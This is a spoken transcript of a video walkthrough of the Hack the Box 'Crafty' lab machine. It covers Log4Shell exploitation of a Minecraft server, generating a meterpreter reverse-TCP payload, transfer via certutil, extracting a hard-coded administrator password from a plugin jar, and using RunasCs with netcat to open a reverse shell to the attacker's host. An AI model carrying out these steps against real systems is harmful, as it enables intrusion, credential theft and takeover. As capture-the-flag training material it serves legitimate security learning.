Hey there. So in this video, this is going to be a walkthrough for the Crafty machine on Hack the Box, and this is a Windows machine. And yeah, let's get started. So I'm using I'm using Kali Linux. I'm using Tmux shell, and Tmux is spelled Tmux if you're curious what it is. And I would you just hit enter and it will just start the shell. And there's a whole lot of benefits to this, so I would use it. And yeah, so I already have my VPN open, and the first thing you want to do is you want to run an nmap scan. But I already ran an nmap scan, and all I got was, let me check my notes. I got a port 80, which is open, and it's just the website. And then you have this port here, which is pretty high. This is a UDP port, and it's Minecraft server port. So it's Minecraft running on it. If you go to the website here, port, yeah, you can put an address, or you can put crafty.htb. I already added it onto my hosts, sudo nano hosts. If you look at my hosts here, here's the address for the Hack the Box, and then I put the domain here, and then I also put this one here. It doesn't matter. This doesn't really help you much. But you can put it there if you want. So it's a good practice to do so. So let me just exit out of here. And yeah, so to hack this box, you have to connect to the Minecraft server. So you need an LDAP server, and you need a Minecraft server. So to get that, um, you're gonna have to go to this website here. Um, Let me just see if I can pull the website log4j. Here you go. So you're gonna go to GitHub, and you wanna use this guy Comer, and use this guy's you want to use his application here. So you want to get that. You also want to need, so this is for the LDAP server, and then also you need the PyCraft server. So this guy here, PyCraft, so you want to get that as well. Let me put the addresses for there so you can see. Let's copy that. So paste this. So this address for that guy for the Minecraft server, and let me just get the other address. The other address is this one here. So this address for the LDAP server. So I'm gonna get that. So I downloaded both of them, and also this this LDAP server, it will not work without the appropriate jar file. So to get that file, you go to you scroll down and you click on this link here, and this is where all the Java files are. And you want to select this one here, the Linux 64. So you want to download this here. And when you download, then you have to extract it. So I downloaded, let me just clear this. So I downloaded it here. And then when you extract it, you just type in tar, that, and then all this. However, so you can't open file. Okay, well, you're supposed to extract it. And when you extract it, you get a file. And I already moved that file into my log4j. So let's go to cd. Can't open no such file, no file recoverable. That's weird. And it's a log4j POC. And it's basically this one here. Now, however, the when you extract it, you'll see this, but there will be a couple more stuff, a couple more digits behind it. You have to name it exactly this. So you have to rename this into this one here. So I'm not quite sure. Well, okay, let me just go back. Okay, let's try this again. Go here. So it's extracting. I'll let that go. Okay, so it's done extracting. If you look into this window, you have it here. So you see this over here, there's an extra digit there. You have to rename this. So you have to take that that 2 out. So you would do sudo move, and you wanna get this, Control C, Control V, and you wanna rename it to, so you're just gonna remove that last 2. It has to be, so you rename it, and then you would move this file into your log4j here. I already moved it there. So if you go to cd log4j, and let me just clear this so it's on top of the screen. So I already have it here, and it's already renamed, and that's it. That's all you really need. So what you can do is I'm gonna split the window. So in Tmux, what you do is you hit Control B, and then you hit Shift, and then the percent, Shift percent, like basically this here, Shift percent, and it splits the window in half. So Control B, and then the arrow to my left goes back to the previous window. Is clear. So I'm gonna start my LDAP server. So you're gonna type in because it's the Python file, you gotta type in. I type in like do sudo Python, Python 3, and then I'm gonna type in POC, and over here, this is my IP address for the and this web port. Well, let me show you. So my IP, so ifconfig, I guess you can see, or IPA. So this is my address on this box. This is my when I connect to this is my VPN address. So that goes right here. And the web port, this could be anything. It doesn't really matter what it is. This could be anything. And this is where you're going to be listening on. So let me just clear that. So what you want to do is you want to start this. Let me just start this up. Python 3. Python, oops. Sorry, let me just clear sudo Python 3, and then POC. Okay, my address everything looks good. So it's running. You should get this, and then you get this over here. So it's listening right now, and this is what you want to paste into the server right once you get started. So this is running. Let me go to this one here. Let's clear the screen. Let's go to downloads. Okay, so so the other website, you need the PyCraft server also working. So this is the PyCraft server, so I'm going to get into that. So cd PyCraft server, and um, this is also a Python file that you want to start. So you want to type in Python sudo Python 3, and then I think, oops, 3, and then here. So when we start, you can give any name. Doesn't matter what the name is. And over here is the address of the box. And don't worry about the port. It automatically assumes what the port is. Again, it assumes this port here, 2000 and 2025 and 2000. Notice 25,565. It assumes this port right there. So you don't have to worry about that. And this is the address of the Crafty machine, as you can see here. This is the Crafty machine address. And all you have to do, and then here's the thing, if it doesn't work, you're gonna have to restart the server because sometimes it works and sometimes it doesn't work. So it says enter your password, just hit enter, and it says connected. If it doesn't say connected, you have to restart the server and then try again. So right now it says connected. If it doesn't say connected, then you just gotta keep on trying over and over again until you see the word connected. And again, if it doesn't work, then go back over here and you wanna restart the server. And then when it restarts, then it should work because for the longest time it wasn't connecting. I didn't know why. And until I restarted the server, then I found it connected. So here it's already connected, and all you have to do is copy this, copy the selection, and then paste it here. But nothing's gonna happen until but you need something listening. So let's go back here. Let's Control B. There we go. So let's start a listener. So I'm gonna do sudo rl wrap. So I like to use the rl wrap because like I'm putting a netcat server listener and netcat, and I'm using rl wrap because it gives you some functionality, but you don't need the rl wrap. You can just use nc. You can use this you can use this by itself. And then the port you want to use is this port right here that you started on, which is 9001 right here. That's the port you want to use. So let's go back. Sudo rl sudo r. Okay, here we go. 9001. So now it's listening. Control B, go up. Now I'm gonna hit enter because I didn't hit enter here. I'm gonna hit enter, and it's connected. Okay, so once that's connected, you no longer need these other two windows. So you can type in you can say you can close them now. So you can say you can just go to Control C and just exit it. So you don't need that anymore. Control B, hey, go over here. You don't need this anymore. Exit that as well. So you're here, you're in the server. Okay, so what you want to do is you want to download, well, you want to download a couple things, but you can download NetApp, but you can't download it here. Actually, you probably need a meterpreter because you need to download stuff from this computer and this computer. If you type in where Python, well, there's a couple. You want to download stuff from this computer, but the easiest way to download stuff from this computer is using a meterpreter session. First of all, this doesn't have Python, so to download stuff onto this computer, what you may want to do is go back to the beginning and go here. I made a file called temp. So you go make dir and then temp, and then it makes it right there. So you make this directory here, and then in this directory you're allowed to download. And I downloaded Netcat for Windows here. I downloaded RunasC here, and this is my meterpreter shell that I made. Okay, so let me show you. Let me just split the window. Control B, Shift percentage, and let me just enlarge this window. Control B, Z. Okay, so you want to make a meterpreter file. It's just a lot easier. So you type in msf venom sudo msf. Oh, here it is, msf venom. And here I'm using a Windows 64 meterpreter reverse TCP. That's what you want to use. Here I'm outputting the shell as shell 5, or you can call it anything you want. The file type is an exe. The L host is basically your computer. This is your computer, and the port here I just have is 4444. So you make this file. I already made the file. You just Control C that. You make this file, and then you upload that file onto your interpreter. So to upload it, Control B, Z. Let's go back here. Control B here. So again, this is the Windows CLS. Oh, I can't clear. Can I clear? It doesn't allow me to clear. Anyways, on this computer, um, to download it, you would type in. First of all, you would go back to your computer and you would open a Python to where your so dir. So you want to type in you want to make a Python server. So I'm just opening a Python server here. So so basically this is order for me. This is some server. So I'll open a Python server and I want to download stuff onto the Windows computer. So to download stuff, you can use a variety. You can use wget, but I've been trying a different downloading method. So I'm going to be using cert util and then you want to type in -url cache dash f, and then the URL that this Python server is working on. So it's HTTP, and then your address, which is 10.10.16.19 dash, and then the name of the file here. So if you want to get the NCE, the netcat, you type in nc.exe, and then you want to type what you want to name it. So you can call it nc. I'm going to call it nc2.exe, and it downloads. And you can see it's downloaded over there. I have an extra copy. Okay, so the point being is that I wanted to make that. I want to upload here. What I really wanted, I wanted that meterpreter shell. So I should have done is got, I think I called it shell 5 or shell 4. So it's shell 4.exe and top is shell 4, and I'm gonna say shell 2 shell 2, or just shell, I just call it shell 4, shell 4.exe, or shell 4.4, and downloads it. So that's my meterpreter file, my from MSF Venom. And once you have that, then you would Control B, go here. You can close this. It's clear. And what you want to do is you want to open a meterpreter session. So let's go to MSF console. And the reason I'm doing that is because if you wait too long, this shell here times out. And it's good to always have an extra shell open just in case. Like in case you have to exit out and then you have to do the whole process over again. So that's what I'm going to do here. So let me just make this bigger. Control B, Z. So this is the whole screen. I think it's still opening. There we go. Okay, so what you want to do is you want to open up an interpreter session. So let's type in well, there's a couple ways of doing it. I would do search, type in meterpreter. You want to type in Windows. You want to type in X64, and you want to type in and this doesn't have to be in any order. I'm just searching for this particular file that I want to use, and I believe reverse underscore TCP, and it'll do a search, and I believe the one I want is this one here, verse TCP. So that's the payload you want. I can type in this. I type in use, and then I can copy paste this. I can copy and paste it, or I can just type in 18, because over here you can see it's 18, right? So it saves me a lot of time. And then you type in let's type in options, and the port's already set for us. And you can sell the L host. I typically do set G because it sets it globally, so it sets it everywhere. And I put my IP address 10.10.10 16.19. It says it's done. Options again, just to confirm it's there. Oops, it's not there. Huh. Set. Oh, I type in L host. L host. There we go. Options. Okay, now it's there. Everything's set up. And all you have to type in is exploit -J. You can do -J or just do exploit. Doesn't really matter. You type in exploit. So it started, is listening. Let's go back to this window. So it's already listening. Let's go back here. All you have to do is type in shell. Okay, so this is the Windows computer, the computer I'm connected to, and I uploaded a couple of files. And the meterpreter, sorry, the MS Venom payload is right here. So it's shell 4. So type in shell 4.exe. Oops. exe. And it's you can see the meterpreter's working, and it gets a shell. And let me just go there and see its sessions. Type in sessions. Okay, so basically, there's a session working. I type in sessions dash I for interactive and put the number. And there we go. I'm connected. And if I type in dir, this is the Windows computer. So I have an extra Windows computer there. Okay, so that's good and all. Okay, let me show you where you want to go. So the only way okay, if you type in who am I, there's a couple. Type in who am I, you see that you are the Crafty SMV Minecraft. So you're not administrator, but there is an administrator on this computer. If you type in net users, so over here you can see that there is an administrator, and that's what you want to aim for. And you can try cmd list keys, cmd keys slash or key cmd key slash list. Okay, so anyways, the only way to elevate your privileges, if you type in who am I slash priv, you don't have much. You really don't have much. The only way to elevate your privilege is to find the password, the administrative password on this computer. And let me just control Z, let's open that. So you want to find the password. So I can tell you where the password is located. So let's change directories to C. Oops. Go right to the beginning. Okay, you want to the password where it's located is in users. Oops, users. Actually, maybe I should use my meterpreter shell for this. Okay, I'm gonna use my meterpreter shell for this. Control B here. Okay, so to get a shell here, type in shell. You don't really need a shell, but it's nice to have a shell. So, or you can just well, type, you're already in this computer, so you don't really need a shell. So type in cd / here. Let me make this big. There we go. And if you type in dir, so you're here. You want to go to cd users, and you want to go to cd. And if you type in the administrator, it won't let you because you're not the administrator. So you did try. So you did add straight. You'll say your permission is denied. So your access denied. So you have access to svc Minecraft here, and you want to type in server. So you want to go into the server, and you are in the server. And you want to go to plugins, and this is something you just have to know. If you're using a Minecraft server, you know the password is stored in plugins. More specifically, is this jar file here. So in order for you to download, there's a couple ways of downloading it, but using Meterpreter is really easy to download. All you have to do is type in. So this is the play counter snapshot jar. You type in download, download in the file name, and then you download it. I already have it. Let me go back. Control B. See. Let me just open a new window. Just go to my downloads. And you can see right here, I already downloaded it right over here. And what you want to do is you want to go through the file. You want to go through this jar file, but you want you need to decompile it. Luckily, there's an online decompiler. So instead of you doing it yourself, you can go online. Let me just open the window here. And I'm typing here. Let's go to Google first. And inside Google, you can type in decompile, compile, and then com, and get to this website here, decompile.com. And you click on here. So here you are. And all you have to do is just upload your file, this jar file. So it's uploaded. And up in the top here, it says counter Java. Click on that, and it shows you the code. So this is online. This is on. So you can do it online. You don't have to download anything. And as you can see here, this is the connect, and this here is the password apparently for the administrator. So you have the password for the administrator right here, and then with this you can log in as the administrator actually. So there's a couple of ways of doing that. One easy way is to use the save as. So most Windows computers have a save as exe file, or you can just download it off online. So if you go here, type in Google again, and I think the one that's most reliable is save as C. So save as C and then S, and then type in GitHub. Oh, maybe don't type in GitHub. I think it's or .exe. Oh, run as, or it's run as CS, and then type in GitHub. And over here you can download it. I think the file is here somewhere. 5 releases. Go to releases, and it is right here. And it's a zip file. You download and then once you have it, you can upload it to this computer. I already did. So if you go to here, Control B, and let's go to 1. Let's go to Control B. Let me just go back to the temp. Temp. See, I have it right here, run as. And what you want to do is you want to open up a reverse shell using the administrator login and password which you already have. So what I'm going to do is I'm going to go Control B, Shift. So I'm going to open up Netcat server. Okay, first of all, again, I don't know if you remember, Control B, you type in who am I? See, I'm over here, I'm Crafty Minecraft. So what I'm going to do is I'm going to elevate that privilege. But before I do that, I have to make a listener. So sudo rl wrap, and let's give it a new port, maybe port 7, 4447. So now it's listening on port 447. Go back up here. Again, you have the run as file, so you type in run as cs.exe. So the first argument is going to be the username, which is going to be administrator. So add administrator. Then the password, and that we saw earlier, I believe it was here. It's a random bunch of characters. So let's paste that. Paste selection, paste that. Oop, that's the wrong one. Let's go back again. Let's copy that. Copy, Control V. There we go. And then in quotation marks, you want to put your command. In this case, I'm going to use an netcat server. So I'm going to say nc.exe, right? So netcat server, and then you want to put your address, which is 10.10.16.19. Your port, and the port we're using is 4447. And what you want to do is you want to -e is, how you want to open it. And I want to open it with the command shell. So cmd.exe, or you can use a PowerShell, is up to you. So exe. So run it. So everything is here. Everything should be in quotation marks. That's good. And there we go. I open up a new session. Control B, go down. Let's make this big here. And if you type in who am I? I'm an administrator. Again, the password and the passwords are located. Let me just go back to the beginning. So now, if you type in users, if you go into users and go into administrator, now you can go into administrator. Straight tour, and I believe the password is in the desktop, because the desktop is typically put all our stuff. Desktop, and there's root password. You type in type. That's the same thing in that's like concatenation in Linux. So type root.txt, and there's your password. And just so you know, the other password, let me just go back because you're an administrator. The other password is in svc Minecraft, and that's also on desk cd desktop, and the type user.txt, and there's that password there. So you should have the user password and the root password. You can drop that into hack the box here. I already owned it, and that's about it. The hardest thing about this box, I would say, because you have to know where the administrator password is. So that's something you just have to know. So if you use Minecraft, you know it's going to be in plugins. Let me just control B said. You know it's going to be plugins, and you also your LDAP server or the Minecraft server, you may have to restart the machine to get the Minecraft server to work. Anyhow, that's about it. Yeah, good luck.